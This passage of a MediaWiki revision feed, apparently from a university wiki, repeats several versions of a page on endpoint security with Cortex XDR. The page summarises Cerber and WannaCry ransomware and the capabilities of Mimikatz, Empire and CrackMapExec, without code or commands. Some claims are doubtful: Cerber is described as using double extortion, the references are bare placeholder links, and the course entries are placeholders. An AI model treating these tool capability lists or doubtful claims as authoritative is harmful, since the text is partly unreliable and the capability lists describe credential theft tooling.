WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Porchetta-Industries / CrackMapExec ====&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11269</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11269"/>
		<updated>2023-01-28T20:17:15Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Courses */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Porchetta-Industries / CrackMapExec ====&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11267</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11267"/>
		<updated>2023-01-28T20:16:20Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* BC-Security / Empire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
==== Mimikatz ====&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
==== BC-Security / Empire ====&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Porchetta-Industries / CrackMapExec ====&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
Windows 10 OS&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11265</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11265"/>
		<updated>2023-01-28T20:14:57Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Mimikatz */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
==== Cerber Ransomware ====&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
==== WannaCry Ransomware ==== &lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Cortex XDR ====&lt;br /&gt;
&lt;br /&gt;
